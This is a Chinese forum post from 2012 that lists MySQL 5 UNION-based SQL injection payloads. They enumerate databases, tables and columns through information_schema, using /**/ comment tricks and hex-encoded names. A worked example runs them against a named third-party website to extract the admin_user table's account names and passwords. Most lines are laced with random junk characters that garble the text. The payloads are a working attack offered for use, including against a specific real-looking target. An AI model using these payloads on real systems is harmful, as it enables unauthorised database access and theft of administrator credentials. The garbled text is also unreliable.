查库1 f+ n# c( X+ C5 q" j% j
1 R Z9 d8 ?# E# F0 t" cid=-1 union select 1,..,SCHEMA_NAME,n from/**/information_schema.SCHEMATA limit 1,1/*
1 k2 @$ D- i" \+ K1 J$ I k1 y1 C
6 A% D0 _8 q7 ]2 s. `: t查表/ N i( i$ Q0 ^0 @" M7 |/ E3 D& {
, r8 u9 Y1 W9 `/ ^" g2 N5 pid=-1/**/union/**/select/**/1,TABLE_NAME,N/**/from/**/information_schema.TABLES/**/where/**/TABLE_SCHEMA=库的HEX值/**/limit/**/1,1
+ W$ G( g+ J! d$ a4 W3 R% Y2 h# ^ m& x/ L/ s
查段
; W" {- Y8 v! Y% e& f5 U! C
! @/ f+ T! f0 \9 p( e2 G( `; Wid=-1/**/union/**/select/**/1,COLUMN_NAME,N/**/from/**/information_schema.COLUMNS/**/where/**/TABLE_NAME=表的HEX值/**/limit/**/1,1
0 f" U0 K& ?! ?1 W Q' ]
9 K1 a {; O3 i+ m. w/ n; t( S$ U2 y k; [" d6 n3 u
mysql5高级注入方法暴表# c" d4 _- C8 N- Y
2 S- r: g$ V0 r4 y4 d$ d5 A8 o/ c1 t/ }例子如下:
. a" t0 B7 ~3 ?% A: b+ L0 j e1 \. H; @ {9 f% ^& A
1.爆表& y6 ]5 W. Y; E+ f6 G) ^
http://www.political-security.com/ccaus_content.php?ccausid=13240/**/and/**/1=2/**/union/**/select/**/1,2,3,TABLE_NAME,5/**/From/**/information_schema.TABLES/**/Where/**/TABLE_SCHEMA=0x79645F7465616D6E6574/**/limit/**/0,1/* (0x79645F7465616D6E6574为数据库名的16进制转换yd_teamnet)
! h2 a- D* h( L- A" w+ O6 g这样爆到第4个时出现了admin_user表。
/ y' A- T! c' {% i6 W' b' Q( J x' n0 j1 y2 G. S2 c& V
2.暴字段
# y0 X) B4 M% u& ^http://www.political-security.com/ccaus_content.php?ccausid=13240/**/and/**/1=2/**/union/**/select/**/1,2,3,COLUMN_NAME,5/**/From/**/information_schema.COLUMNS/**/Where/**/TABLE_NAME=0x61646D696E5F75736572/**/And/**/TABLE_SCHEMA=0x79645F7465616D6E6574/**/limit/**/0,1/*" |! o# s9 ^: Q; W5 Q+ e
+ t$ v* A* P, f! C4 o$ t
4 O/ z1 Q S, j3.爆密码
# b1 C, x, M6 p T: ]" Ohttp://www.political-security.com/ccaus_content.php?ccausid=13240/**/and/**/1=2/**/union/**/select/**/1,2,3,concat(0x7c,ID,0x7c,ACCOUNT,0x7c,PASSWORD,0x7c),5/**/From/**/admin_user/**/limit/**/0,1/*
' N( ?1 x% x0 }; ]+ E/ Q
q/ ~7 A6 T4 o$ Q* m4 K6 t# N
7 N, o" Y4 d; p6 C& o- ~: d |
发表于 2012-9-13 16:29:37
收藏
支持
反对